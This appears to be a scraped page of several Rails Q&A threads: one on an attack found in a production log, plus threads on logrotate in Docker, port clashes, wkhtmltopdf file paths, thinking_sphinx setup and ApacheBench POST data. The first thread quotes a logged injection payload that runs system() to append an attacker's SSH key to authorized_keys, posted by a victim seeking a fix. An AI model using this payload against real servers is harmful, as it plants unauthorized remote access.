I noticed some unusual activity on my website a couple days ago so I decided to check out the production log. Here is what I found:
Started GET "/" for 74.219.112.36 at 2013-01-11 20:25:05 +0000
Processing by HomeController#logo as */*
Parameters: {"exploit"=>#
<ActionDispatch::Routing::RouteSet::NamedRouteCollection:0xcb7e650
#routes={:"foo; system('cd ~;mkdir .ssh;echo ssh-rsa
AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV
/l4+De+BBFg/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9p
DjKuymKEVbsJbOqrnNMXlUtxCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzq
TtOKhnJvzgA4eZSVZsVlxTwyFM= root >> ~/.ssh/authorized_keys')\n__END__\n"=>
#<OpenStruct defaults={:action=>"create", :controller=>"foos"},
required_parts=[], requirements={:action=>"create", :controller=>"foos"},
segment_keys=[:format]>}, #helpers=[:"hash_for_foo; system('cd ~;
mkdir .ssh;echo ssh-rsa
AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV
/l4+De+BBFg/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbs
JbOqrnNMXlUtxCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlx
TwyFM= root >> ~/.ssh/authorized_keys')\n__END__\n_url", :"foo;
system('cd ~;mkdir .ssh;echo ssh-rsa
AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg
/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUtxCefeG
T1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM=
root >> ~/.ssh/authorized_keys')\n__END__\n_url", :"hash_for_foo;
system('cd ~;mkdir .ssh;echo ssh-rsa
AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg
/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUt
xCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= root >>
~/.ssh/authorized_keys')\n__END__\n_path", :"foo; system('cd ~;mkdir .ssh;
echo ssh-rsa
AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg
/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUtxCefeG
T1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= root >>
~/.ssh/authorized_keys')\n__END__\n_path"], #module=#<Module:0xcb7e5c4>>}
Rendered landing_users/_form.html.haml (4.7ms)
Rendered home/logo.html.haml within layouts/application (7.8ms)
Completed 200 OK in 11ms (Views: 10.4ms | ActiveRecord: 0.0ms)
I went on to check if their system calls worked and sure enough in ~/.ssh/authorized_keys I found the same ssh key. So this means they were able to run system calls through my rails app!!!! Thankfully my rails app isn't run under root so they did not get root access. But regardless this terrifies me.
Has anyone encountered this exploit before? If so how did you patch it?
My rails app is on Ubuntu 12.04, using rails version 3.2.8 and ruby version 1.9.3p125. If any other information would help out please let me know!
I found a blog post referring to this exploit but no solutions, just how to perform it.
Did you follow the link in that blog?
On January 8th, Aaron Patterson announced CVE-2013-0156
If you did, you would see that it is fixed in Rails 3.2.11.
Update your app immediately!
Related
I have a Ruby on Rails application running on Docker and would like to rotate my production logs every day. In the spirit of keeping everything self-contained, I would like to keep the log rotation on Docker itself as well. Here's the logrotate configuration on my Docker container:
/etc/logrotate.conf
# rotate log files weekly
weekly
# keep 1 week worth of backlogs
rotate 1
# create new (empty) log files after rotating old ones
create
# use date as a suffix of the rotated file
dateext
# uncomment this if you want your log files compressed
#compress
# packages drop log rotation information into this directory
include /etc/logrotate.d
# system-specific logs may be also be configured here.
# Rotate Rails logs
/myapp/log/*.log {
daily
missingok
rotate 7
compress
delaycompress
notifempty
copytruncate
}
Permissions for /etc/logrotate.conf:
-rw-r--r-- 1 root root 656 Jul 13 02:06 /etc/logrotate.conf
After a day, my log file has not been rotated. I know this isn't an issue with my container being recreated because it's been running for 6 days.
When I go to test it, I get an error message on every line:
> logrotate -d /myapp/log/production.log
...
> error: production.log:56257 unknown option 'I' -- ignoring line
> error: production.log:56258 unknown option 'I' -- ignoring line
> error: production.log:56259 unknown option 'I' -- ignoring line
Here are the permissions on my production.log:
-rw-r--r-- 1 root root 10868754 Jul 14 12:42 /myapp/log/production.log
And when I check what's in the log file, the contents are indeed there:
I, [2022-07-13T02:48:23.666904 #1] INFO -- : Raven 3.1.0 ready to catch errors
I, [2022-07-13T03:00:18.483790 #8] INFO -- : Raven 3.1.0 ready to catch errors
I, [2022-07-13T03:00:34.021416 #22] INFO -- : Started GET "/healthcheck" for xxx.xx.xx.xx at 2022-07-13 03:00:34 +0000
I, [2022-07-13T03:00:34.026047 #22] INFO -- : Processing by HealthcheckController#show as HTML
I, [2022-07-13T03:00:34.027170 #29] INFO -- : Started GET "/healthcheck" for xxx.xx.xx.xx at 2022-07-13 03:00:34 +0000
I, [2022-07-13T03:00:34.031331 #29] INFO -- : Processing by HealthcheckController#show as HTML
I, [2022-07-13T03:00:34.038132 #20] INFO -- : Started GET "/healthcheck" for xxx.xx.xx.xx at 2022-07-13 03:00:34 +0000
I, [2022-07-13T03:00:34.042771 #20] INFO -- : Processing by HealthcheckController#show as HTML
I, [2022-07-13T03:00:34.040177 #20] INFO -- : Started GET "/healthcheck" for xxx.xx.xx.xx at 2022-07-13 03:00:34 +0000
I, [2022-07-13T03:00:34.221546 #20] INFO -- : Processing by HealthcheckController#show as HTML
What can I do to get logrotate to rotate my logs?
Thanks to #β.εηοιτ.βε, I found out that I needed to specify the config file, not the log file, in the logrotate arguments when debugging it, like this:
logrotate -d /etc/logrotate.conf
That revealed there was nothing wrong with my configuration. Then I forced a log rotation with:
logrotate -f /etc/logrotate.conf
And it worked! As for why my log file was not rotated after a day, this SO post suggested that cron may not be running in the container, which I found out to be true in my case:
> service cron status
[FAIL] cron is not running ... failed!
I updated my Dockerfile's entrypoint to start cron. So it looks like this now:
Dockerfile
...
CMD /bin/bash
ENTRYPOINT [ "./docker/web-entrypoint.sh" ]
docker/web-entrypoint.sh
#!/bin/sh
set -e
if [ -f tmp/pids/server.pid ]; then
rm tmp/pids/server.pid
fi
cron service start # New line added
bundle exec rails s -b 0.0.0.0 -p 3000
Now it's all working!
I am working on a sample react/rails app based on this.
It was working fine for a few days before this issue arose, and I can't figure out what caused it or how to fix it.
I get this behavior for any port I try to run the web server on.
This kind of thing lists no processes to kill: lsof -nP -iTCP:3000| grep LISTEN
This also shows no results: lsof -i tcp:3000
It seems like react starts fine (on 3000), then rails starts (on 3001) then there is a collision of some kind causing it to shut down.
Here is the Procfile.dev I am using:
web: PORT=3000 yarn --cwd client run start
api: PORT=3001 bundle exec rails s
The react app lives in the /client directory within the rails app.
Here is the proxy line from the react app's package.json: "proxy": "http://localhost:3001/",
Here is the terminal output:
$ bin/rake start
Running via Spring preloader in process 41869
[OKAY] Loaded ENV .env File as KEY=VALUE Format
12:38:45 PM web.1 | yarn run v1.22.4
12:38:45 PM web.1 | $ react-scripts start
12:38:46 PM api.1 | => Booting Puma
12:38:46 PM api.1 | => Rails 6.0.3.1 application starting in development
12:38:46 PM api.1 | => Run `rails server --help` for more startup options
12:38:46 PM web.1 | Something is already running on port 3000.
12:38:46 PM web.1 | Done in 1.06s.
[DONE] Killing all processes with signal SIGINT
12:38:46 PM web.1 Exited Successfully
12:38:46 PM api.1 | Exiting
12:38:46 PM api.1 Exited Successfully
The rake task (lib/tasks/start.rake) is:
namespace :start do
task :development do
exec 'heroku local -f Procfile.dev'
end
end
desc 'Start development server'
task :start => 'start:development'
Thanks for taking a look!
do export PORT = 'portNumber' (without the quotes) just before you run npm start
I ended up just wiping the repo and cloning the older version. Now everything works fine, I just lost like a day of work. I think that is good enough for me.
Here's an odd little problem that's led me to post my first question on SO. I am using wkhtmltopdf to convert an HTML document to a PDF as part of a Rails app. To do so, I am rendering the Rails web page to a static HTML file in a temp directory, copying a static header, footer and images to the same temp directory, then executing wkhtmltopdf using "system".
This works perfectly in Development and Test environments. In my Staging env, it does not. I suspected permissions at first, but the first couple of parts of that process (creating the HTML static files and copying them to the directory) are working. I can run wkhtmltopdf from the command line in that temp directory and get the expected outcome. Finally, I ran wkhtmltopdf via both "system" and backticks through the Rails console in staging environment, and here's what I get as output:
> `wkhtmltopdf --footer-html tmp/invoices/footer.html --header-html tmp/invoices/header.html -s Letter -L 0in -R 0in -T 0.5in -B 1in tmp/invoices/test.html tmp/invoices/this.pdf`
Loading pages (1/6)
QPainter::begin(): Returned false ] 10%
Error: Unable to write to destination
Error: Failed loading page http://tmp/invoices/test.html (sometimes it will work just to ignore this error with --load-error-handling ignore) => ""
Notice that last bit. I'm pointing to local files, but it's looking for them via http. OK, I think, maybe I need to be explicit and feed it the file:// protocol so it doesn't look for http. So I try this:
> system("wkhtmltopdf --footer-html file://Library/Server/Web/Data/Sites/intranet-staging/current/tmp/invoices/footer.html --header-html file://Library/Server/Web/Data/Sites/intranet-staging/current/tmp/invoices/header.html -s Letter -L 0in -R 0in -T 0.5in -B 1in file://Library/Server/Web/Data/Sites/intranet-staging/current/tmp/invoices/test.html file://Library/Server/Web/Data/Sites/intranet-staging/current/tmp/invoices/this.pdf")
Loading pages (1/6)
Error: Failed loading page file://library/Server/Web/Data/Sites/intranet-staging/current/tmp/invoices/test.html (sometimes it will work just to ignore this error with --load-error-handling ignore)
=> false
Notice that this one fails with a lowercase "l" on Library. What the heck? (And no, it doesn't get any better with the recommendation to ignore the error with that switch.)
Any ideas? Is there a Rails or Ruby setting that would cause system commands to get rewritten? Is there an option I can add to wkhtmltopdf to make sure it loads from local file? I'm quite baffled. Thanks!
I have had success when using the absolute file path (notice the extra slash after the file://)
wkhtmltopdf --footer-html file:///Library/Server/Web/Data/Sites/intranet-staging/current/tmp/invoices/footer.html --header-html file:///Library/Server/Web/Data/Sites/intranet-staging/current/tmp/invoices/header.html -s Letter -L 0in -R 0in -T 0.5in -B 1in file:///Library/Server/Web/Data/Sites/intranet-staging/current/tmp/invoices/test.html file:///Library/Server/Web/Data/Sites/intranet-staging/current/tmp/invoices/this.pdf
This is the same on windows
Unix path
file:///absolute/path/to/file
Windows path
file:///C:/absolute/path/to/file
In last 0.11 whicked-pdf i found one bug
Example
C:\Ruby193\lib\ruby\gems\1.9.1\gems\wicked_pdf-0.11.0\lib>wicked_pdf.rb
Line 198 I change from:
options[hf][:html][:url] = "file://#{tf.path}" to options[hf][:html][:url] = "file:///#{tf.path}" - (change // to ///)
After change whicked-pdf again worked.
Take a look at the wicked_pdf gem.
You can add a PDF mime type and then whatever page you want pdf'd, just tack on a .pdf to the URL.
I am using this in prod and it works quite well.
No need to call wkhtmltopdf directly.
Problem:
I am trying to get sphinx running again after server reboot. There seems to be no sphinx.conf file when I try to start it running:
>searchd
Sphinx 2.0.4-release (r3135)
Copyright (c) 2001-2012, Andrew Aksyonoff
Copyright (c) 2008-2012, Sphinx Technologies Inc (http://sphinxsearch.com)
FATAL: no readable config file (looked in /etc/sphinxsearch/sphinx.conf, ./sphinx.conf).
I have run:
rake thinking_sphinx:configure
rake thinking_sphinx:index
rake thinking_sphinx:start
The problem is for some reason no etc/sphinxsearch/sphinx.conf file is being created... I am new to thinking_sphinx and this might not be the only problem (with the site), but it doesn't seem to be set up fully. For out put and more information read below:
Background info:
I am working on a project I didn't set up initially. We rebooted the server to see some of the changes we made in a constants file. But after the reboot the project no longer displays when you navigate to the site. When you put in the straight ip address it just says "Welcome to Nginx".
The port is open and working through our hosting server, so I was told I have to restart some services. One of the issues I came upon was with thinking_sphinx. This was the rake tasks for sphinx site I referenced. As well as common configuration issues for sphinx.
I set up the sphinx.yml development paths (we aren't using production). Then I ran
>rake thinking_sphinx:index
which seems to have worked even though it output some warnings:
Generating Configuration to /home/potato/streetpotato/config/development.sphinx.conf
(0.2ms) SELECT ##global.sql_mode, ##session.sql_mode;
Sphinx 2.0.4-release (r3135)
Copyright (c) 2001-2012, Andrew Aksyonoff
Copyright (c) 2008-2012, Sphinx Technologies Inc (http://sphinxsearch.com)
using config file '/home/potato/streetpotato/config/development.sphinx.conf'...
indexing index 'bar_core'...
WARNING: collect_hits: mem_limit=0 kb too low, increasing to 14080 kb
collected 249 docs, 0.0 MB
sorted 0.0 Mhits, 100.0% done
total 249 docs, 32394 bytes
total 0.254 sec, 127298 bytes/sec, 978.49 docs/sec
indexing index 'bar_delta'...
WARNING: collect_hits: mem_limit=0 kb too low, increasing to 14080 kb
collected 0 docs, 0.0 MB
total 0 docs, 0 bytes
total 0.003 sec, 0 bytes/sec, 0.00 docs/sec
skipping non-plain index 'bar'...
indexing index 'synonym_core'...
WARNING: collect_hits: mem_limit=0 kb too low, increasing to 13568 kb
collected 3 docs, 0.0 MB
sorted 0.0 Mhits, 100.0% done
total 3 docs, 103 bytes
total 0.003 sec, 30356 bytes/sec, 884.17 docs/sec
indexing index 'synonym_delta'...
WARNING: collect_hits: mem_limit=0 kb too low, increasing to 13568 kb
collected 0 docs, 0.0 MB
total 0 docs, 0 bytes
total 0.002 sec, 0 bytes/sec, 0.00 docs/sec
skipping non-plain index 'synonym'...
indexing index 'user_core'...
WARNING: collect_hits: mem_limit=0 kb too low, increasing to 13568 kb
collected 100 docs, 0.0 MB
sorted 0.0 Mhits, 100.0% done
total 100 docs, 3146 bytes
total 0.013 sec, 239348 bytes/sec, 7608.03 docs/sec
skipping non-plain index 'user'...
total 11 reads, 0.000 sec, 3.8 kb/call avg, 0.0 msec/call avg
total 37 writes, 0.000 sec, 2.5 kb/call avg, 0.0 msec/call avg
Then I ran
>rake thinking_sphinx:configure
Generating Configuration to /home/potato/streetpotato/config/development.sphinx.conf
(0.2ms) SELECT ##global.sql_mode, ##session.sql_mode;
Lastly running:
>rake thinking_sphinx:start
Started successfully (pid 29623).
Now even though my log says:
[Fri Nov 16 19:34:29.820 2012] [29623] accepting connections
There is still no sphinx.conf file being generated and when I try to use the searchd command it still gives me the error...
>searchd --stop
Sphinx 2.0.4-release (r3135)
Copyright (c) 2001-2012, Andrew Aksyonoff
Copyright (c) 2008-2012, Sphinx Technologies Inc (http://sphinxsearch.com)
FATAL: no readable config file (looked in /etc/sphinxsearch/sphinx.conf, ./sphinx.conf).
I am at a loss, I know this is super long but only because I am so lost and trying to give as much information as possible. I got further then I did yesterday with this but it still doesn't seem to be fully working. I might have to do more set up with unicorn or thin as well. I'm just trying to figure out how to get the site back up and running again... If any one has run into similar issues with their site going down after reboot and got it back up (specifically a rails project on Nginx and unicorn or thin using sphinx) any insight would be appreciated.
Thanks,
Alan
Calm down!! :-)
Firstly, you don't need a /etc/sphinxsearch/sphinx.conf file; that is just the default file that searchd tries to use when you don't specify any configuration file.
As your log output shows, your rails application is using /home/potato/streetpotato/config/development.sphinx.conf file when it starts the searchd process.
Run ps -fe | grep searchd on your dev machine; you should see something like this as the output:
501 14128 1 0 0:00.00 ttys004 0:00.00 searchd --pidfile --config /home/potato/streetpotato/config/development.sphinx.conf
501 14130 13546 0 0:00.00 ttys004 0:00.01 grep searchd
So rails app calls searchd with --config /home/potato/streetpotato/config/development.sphinx.conf argument, to specify a different conf file.
From your logs, it is clear that thinkingsphinx is running fine. You can confirm it further by logging into rails console and running a search method on one of the models which have thinking_sphinx indexes defined on them.
Eg: If your app has an Article model as shown in the above link, the following command will show all articles having National Parks in them:
$ rails console
> Article.search( "National Parks" )
=> [#<Article id: 15,... >, #<Article id: 22,...>,...]
The real problem is the application not showing after restarting the server. That has nothing to do with thinking sphinx which is running fine.
Try rolling back all the changes made in the constants file that you mention above, and make sure the application is working fine. Then start making the changes one by one and isolate the one change that breaks your application.
So yeah, this is a hole in ThinkingSphinx (IMHO) -- you can start the sphinxd server using the various rake tasks (which generate the config as needed) ... but this doesn't work in production.
On a project I worked in last year (running on a Linux server) we created an /etc/init.d script to start sphinxd -- it takes options including a path to the configuration file. We did our deploys with capistrano, and put generated code in app/shared -- a directory outside of the source tree. I believe there are some predefined capistrano tasks that will rebuild the Rails-specific config files when models change or otherwise affect what Sphinx does (same as the rake task you mention).
This was one of those cases for us where we had been putting off site search for a long time, and one of our developers got it "all set up" in an afternoon. Getting it deployed took a lot more work.
(Just saw answer from #prakash-murthy -- he provides some details of how to specify config path when you initialized sphinxd). But the trick is to have it start when the system starts and pointing to the config that ThinkingSphinx generates.)
Ok so after a day n a half I finally set it all up and got it running (it was more then just sphinx). I also had to get nginx and unicorn up and running in the background, since we didn't have scripts set up to restart them when the server was rebooted...
When rebooting the server you have to restart some services before the app will be accessible:
1) thinking_sphinx
reference sites
http://pat.github.com/ts/en/rake_tasks.html
http://www.claytonlz.com/2010/09/thinkingsphinx-conf-problems/
a)create/modify app/config/sphinx.yml
development:
morphology: stem_en
port: 9312
bin_path: "/usr/bin" # set up the path to binary for searchd
searchd_binary_name: searchd
indexer_binary_name: indexer
#mem_limit: 128M
test:
morphology: stem_en
port: 9312
mem_limit: 128M
production:
morphology: stem_en
port: 9312
mem_limit: 512M
# the searchd ip, in case it's not on localhost
# address: 10.10.0.0
# this is by default included in db/sphinx
# searchd_file_path: "/path/to/shared/folder/sphinx"
b)rake thinking_sphinx:index
c)rake thinking_sphinx:configure # creates config/development.sphinx.conf which helps define sphinx's indexing
d)# then you have to start sphinx, there are 2 ways to do this
rake thinking_sphinx:start
rake thinking_sphinx:stop
OR
searchd
searchd --stop
# only the rake commands worked for me, when I tried to run searchd
# I got an error FATAL: no readable config file (looked in /etc/sphinxsearch/sphinx.conf, ./sphinx.conf).
# for some reason we dont have a sphinx.conf file, but the rake commands work without it
e)# once you start thinking_sphinx check log/searchd.log file for the line
[Fri Nov 16 19:34:29.820 2012] [29623] accepting connections
2) nginx
reference site:
http://wiki.nginx.org/CommandLine
a) check that nginx is up and running
i) start server
# to check where nginx resides type in this into server console
which nginx
# whatever path it gives you is how you start the server this is my path
/usr/sbin/nginx
ii) stop server
/usr/sbin/nginx -s stop # use the path given by which command
3) unicorn (starting app server)
reference site:
http://codelevy.com/2010/02/09/getting-started-with-unicorn.html
a) test if unicorn will run after previous changes
unicorn_rails -p 3000
# the site should now be up and running, check that it is
# console should now log the different actions you do on the site
b) create unicorn.rb in config folder (if none is there)
# only start this step if the step above got the site running
# close the console or exit the process you started above
# contents of unicorn.rb
worker_processes 2 #(starts 2 child processes, not completely neccissary)
preload_app true
timeout 30
listen 3000
after_fork do |server, worker|
ActiveRecord::Base.establish_connection
end
c) run unicorn in the background
# make sure you exited the process above before running this
unicorn_rails -c config/unicorn.rb -D
# this was giving me an error that it said was logged by stderr
# I got the command to run by adding a command to the front
http://stackoverflow.com/questions/2325152/check-for-stdout-or-stderr
exec 2> /dev/null unicorn_rails -c config/unicorn.rb -D
d) (optional) check stats from starting unicorn
i) pgrep -lf unicorn_rails
#sample output
5374 unicorn_rails master -c config/unicorn.rb -D
5388 unicorn_rails worker[0] -c config/unicorn.rb -D # not needed currently
5391 unicorn_rails worker[1] -c config/unicorn.rb -D # not needed currently
ii) cat tmp/pids/unicorn.pid # from inside the streetpotato folder
#sample output
5374
i am trying to use apache bench to load test a create action in my rails application but ab doesn't appear to be sending the POST data - though it does correctly submit a POST and not a GET request.
this is the command i run:
ab -n 1 -p post -v 4 "http://oz01.zappos.net/registrations"
and this is the contents of the post file:
authenticity_token=M18KXwSOuIVbDPZOVQy5h8aSGoU159V9S5uV2lpsAI0
the rails logs show a POST request coming through but don't show any parameters being posted:
Started POST "/registrations" for 10.66.210.70 at Thu Sep 09 17:48:06 -0700 2010
Processing by RegistrationsController#create as */*
Rendered registrations/new.html.erb within layouts/application (14.0ms)
Completed 200 OK in 24ms (Views: 14.6ms | ActiveRecord: 0.1ms)
whereas a POST request coming from a browser results in this log entry:
Started POST "/registrations" for 192.168.66.20 at Thu Sep 09 17:49:47 -0700 2010
Processing by RegistrationsController#create as HTML
Parameters: {"submit"=>"true", "authenticity_token"=>"AfNG0UoTbJXnxke2725efhYAoi3ogddMC7Uqu5mAui0=", "utf8"=>"\342\234\223", "registration"=>{"city"=>"", "address"=>"", "name"=>"", "zip"=>"", "optin"=>"0", "state"=>"", "email"=>""}}
Rendered registrations/new.html.erb within layouts/application (13.7ms)
Completed 200 OK in 24ms (Views: 14.3ms | ActiveRecord: 0.1ms)
and finally, this is what ab logs for the request:
---
POST /registrations HTTP/1.0
User-Agent: ApacheBench/2.0.40-dev
Host: oz01.zappos.net
Accept: */*
Content-length: 63
Content-type: text/plain
---
why is it not picking up the post data?
if the "post" file is not there then i get an error message saying it can't find the file so i know at very least it is finding the file...
Maybe you need the -T option as stated in man ab:-
ab -n 1 -p post -v 4 -T application/x-www-form-urlencoded "http://oz01.zappos.net/registrations"
I tested with Django and it seem that Django don't really care about the content type header (it displayed the POSTed content whether I used -T or not) but Rails maybe want it.
Old question, but for the sake of anyone else who searches SO for this, here's how I got it to work.
Make EXTRA sure your post file is properly URL encoded with no extra non-printing characters or anything at the end. The most error-free way is just create it with code. I used some python to create mine:
>>> import urllib
>>> outfile = open('post.data', 'w')
>>> params = ({ 'auth_token': 'somelongstringthatendswithanequalssign=' })
>>> encoded = urllib.urlencode(params)
>>> outfile.write(encoded)
>>> outfile.close()
Example output:
auth_token=somelongstringthatendswithanequalssign%3D